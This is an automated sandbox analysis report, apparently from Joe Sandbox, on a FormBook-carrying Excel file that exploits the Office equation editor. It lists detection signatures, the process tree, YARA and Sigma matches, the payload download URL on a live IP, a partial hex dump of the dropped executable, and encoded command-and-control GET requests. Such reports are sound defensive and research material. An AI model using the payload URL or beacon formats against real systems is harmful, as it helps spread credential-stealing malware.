Loading ...

Play interactive tourEdit tour

Analysis Report P. I.xlsx

Overview

General Information

Sample Name:P. I.xlsx
Analysis ID:323360
MD5:8600b18fcd47eb7a8708abdfd7266a88
SHA1:6a7b0f2d86d7be943fc52c66156f7d3849c561ab
SHA256:06aa501a864eff9930c64b5d9ac9ce52f947b0f993615823828d2a57c41f833a
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1476 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2516 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: DA5CE3FE1991B9ACEF3B0BEEC210EE9F)
      • vbc.exe (PID: 2844 cmdline: {path} MD5: DA5CE3FE1991B9ACEF3B0BEEC210EE9F)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • svchost.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)
            • cmd.exe (PID: 3012 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x10ac8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x10e62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x1cb75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1c661:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x1cc77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1cdef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x1187a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1b8dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x125f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x21c67:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x22d0a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1eb99:$sqlite3step: 68 34 1C 7B E1
    • 0x1ecac:$sqlite3step: 68 34 1C 7B E1
    • 0x1ebc8:$sqlite3text: 68 38 2A 90 C5
    • 0x1eced:$sqlite3text: 68 38 2A 90 C5
    • 0x1ebdb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1ed03:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 21 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158c9:$sqlite3step: 68 34 1C 7B E1
          • 0x159dc:$sqlite3step: 68 34 1C 7B E1
          • 0x158f8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
          • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
          5.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2516, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.188, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2516, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2516, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Sigma detected: Executables Started in Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2516, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
            Sigma detected: Execution in Non-Executable FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2516, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
            Sigma detected: Suspicious Program Location Process StartsShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2516, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
            Sigma detected: Suspicious Svchost ProcessShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2380
            Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 2380

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://198.23.212.188/reg/vbc.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted fileShow sources
            Source: P. I.xlsxReversingLabs: Detection: 31%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000004.00000002.2139352712.0000000003361000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 002D4AC5h
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then jmp 002D4AC5h
            Source: global trafficDNS query: name: www.myecovet.com
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49166
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Nov 2020 20:22:22 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11Last-Modified: Thu, 26 Nov 2020 15:58:02 GMTETag: "79a00-5b5049bd7f7fe"Accept-Ranges: bytesContent-Length: 498176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 cb bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8e 07 00 00 0a 00 00 00 00 00 00 26 ac 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 4f 00 00 00 00 c0 07 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c 8c 07 00 00 20 00 00 00 8e 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 c0 07 00 00 08 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ac 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 f8 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 0
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1Host: www.myecovet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.snhdt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1Host: www.kapkwata.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.penrosecondos-official.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1Host: www.teleeducationforafghanistan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.thevirginiahomesource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
            Source: Joe Sandbox ViewASN Name: RMH-14US RMH-14US
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
            Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EAFAC90.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=jNDZ6p/mqvXz+lV8Z3ikV5w1yZNnar/gT18SrTzuUceB+Xpt3Ns987IJweZa7faZLQZG0w== HTTP/1.1Host: www.myecovet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=vQj7cG2IwCBebrWG7gzNgppGgW/+TNOkvFpT9t0IQRDO6wT6r+9Ecp7CibhH0Ta6s7MNzw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.snhdt.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=GKk2d32OHEJliZV7lc1R0hFu4AxFv3Wk4g8o+d/QQJC2fTrUsNVYmPem7KfYQyXD+5gDrQ== HTTP/1.1Host: www.kapkwata.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=aFYZso2mvNEUZnS9j6THNTuqPDrOfInARvQYZFtdg9PpX/64PIjCzIwYqotU8KZChZyPAA==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.penrosecondos-official.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?Nxl0wV=htxXA6k0ApBh&MPxhwJ=RDRn2Ild+/wzWORBRjhdFX6pRz32wHRA4wkCN1Xv+JiXsB19Ecc8PMGycfEZfvp5cD+cKQ== HTTP/1.1Host: www.teleeducationforafghanistan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /coz3/?MPxhwJ=r7KW2tdRwlRuK7ncHXLiovSXqLjDerMq8ItDnZvkA+2BRQOB5Pe97gh02v96lMs3N6IAbw==&Nxl0wV=htxXA6k0ApBh HTTP/1.1Host: www.thevirginiahomesource.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000006.00000000.2165087542.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
